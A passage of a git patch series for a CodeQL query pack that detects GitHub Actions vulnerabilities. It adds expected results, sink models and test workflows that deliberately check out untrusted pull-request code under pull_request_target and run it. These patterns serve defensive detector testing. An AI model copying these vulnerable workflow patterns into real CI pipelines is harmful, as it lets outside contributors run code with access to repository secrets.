-f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -588,11 +665,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -629,8 +706,30 @@ cfgNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -709,7 +808,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -746,8 +845,30 @@ dfNodes | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -828,7 +949,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:29:43 | .github/workflows/poisonable_steps.yml@5:5:29:43 | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | @@ -865,8 +986,30 @@ nodeLocations | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -887,7 +1030,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | From e23054292b86b7b1005595849b19e267f44a95bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:02 +0200 Subject: [PATCH 388/707] feat(tests): Add new tests Add new tests to verify that even if a job is privileged, if the vulnerability takes place in a different one, it should be considered as non-priveleged and reported as Cache Poisoning instead of Untrusted Checkout --- .../CWE-349/.github/workflows/test21.yml | 44 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 + .../CWE-829/.github/workflows/test8.yml | 44 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 5 files changed, 92 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml new file mode 100644 index 000000000000..381cc16a6d16 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml @@ -0,0 +1,44 @@ +name: OpenAPI +on: + push: + branches: + - master + tags: + - 'v*' + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + name: OpenAPI - BASE + if: ${{ github.base_ref != '' }} + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - name: Generate openapi.json + run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" + + publish-unstable: + name: OpenAPI - Publish Unstable Spec + if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} + runs-on: ubuntu-latest + needs: + - openapi-base + steps: + - name: Upload openapi.json (unstable) to repository server + uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 + with: + host: "${{ secrets.REPO_HOST }}" + username: "${{ secrets.REPO_USER }}" + key: "${{ secrets.REPO_KEY }}" + source: openapi-head/openapi.json + strip_components: 1 + target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 2580531afd3b..eb1412bf0e28 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -155,6 +155,7 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | @@ -177,3 +178,4 @@ edges | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml new file mode 100644 index 000000000000..381cc16a6d16 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml @@ -0,0 +1,44 @@ +name: OpenAPI +on: + push: + branches: + - master + tags: + - 'v*' + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + name: OpenAPI - BASE + if: ${{ github.base_ref != '' }} + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - name: Generate openapi.json + run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" + + publish-unstable: + name: OpenAPI - Publish Unstable Spec + if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} + runs-on: ubuntu-latest + needs: + - openapi-base + steps: + - name: Upload openapi.json (unstable) to repository server + uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 + with: + host: "${{ secrets.REPO_HOST }}" + username: "${{ secrets.REPO_USER }}" + key: "${{ secrets.REPO_KEY }}" + source: openapi-head/openapi.json + strip_components: 1 + target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index f2d229e80bb5..7b758b0da6d5 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -325,6 +325,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e0164eafac85..05931dfe3121 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -6,3 +6,4 @@ | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From f4dd771d1cc1dd791e4d74ffed89093bf5cdc455 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:18 +0200 Subject: [PATCH 389/707] feat(models): Add models for ssh-action --- ql/lib/ext/manual/appleboy_ssh-action.model.yml | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 ql/lib/ext/manual/appleboy_ssh-action.model.yml diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml new file mode 100644 index 000000000000..c489f8edc85c --- /dev/null +++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"] + - ["appleboy/ssh-action", "*", "input.envs", "envvar-injection", "manual"] + From f1d1c1e55a2c07e756dd7fa4635cc29c2a248798 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:37 +0200 Subject: [PATCH 390/707] Bump QL versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 554ef6bbe7f3..3d20e00dddea 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.15 +version: 0.1.16 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e72b14fb3582..6b41b38f9a4c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.15 +version: 0.1.16 groups: [actions, queries] suites: codeql-suites extractor: javascript From 53b88627e5eb15bcee5f524fb7884321dbb77eae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 12:15:49 +0200 Subject: [PATCH 391/707] feat(core): Exclude worflow_run#branches#default branch from externally triggerable events --- ql/lib/codeql/actions/Helper.qll | 8 ++++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++++++- .../codeql/actions/security/CachePoisoningQuery.qll | 11 +---------- .../.github/workflows/workflow_run_branches1.yml | 13 +++++++++++++ .../.github/workflows/workflow_run_branches2.yml | 13 +++++++++++++ .../.github/workflows/workflow_run_branches3.yml | 12 ++++++++++++ .../Security/CWE-094/CodeInjectionCritical.expected | 4 ++++ .../Security/CWE-094/CodeInjectionMedium.expected | 5 +++++ 8 files changed, 68 insertions(+), 11 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 3c7091d2a85d..b08b62c8a583 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,5 +1,6 @@ private import codeql.actions.Ast private import codeql.Locations +import codeql.actions.config.Config private import codeql.actions.security.ControlChecks bindingset[expr] @@ -264,3 +265,10 @@ predicate outputsPartialFileContent(string snippet) { ".*" ]) } + +string defaultBranchNames() { + repositoryDataModel(_, result) + or + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and + result = ["main", "master"] +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index bb31e198cc62..e2dfd6076df7 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -710,7 +710,18 @@ class EventImpl extends AstNodeImpl, TEventNode { /** Holds if the event can be triggered by an external actor. */ predicate isExternallyTriggerable() { // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getName()) 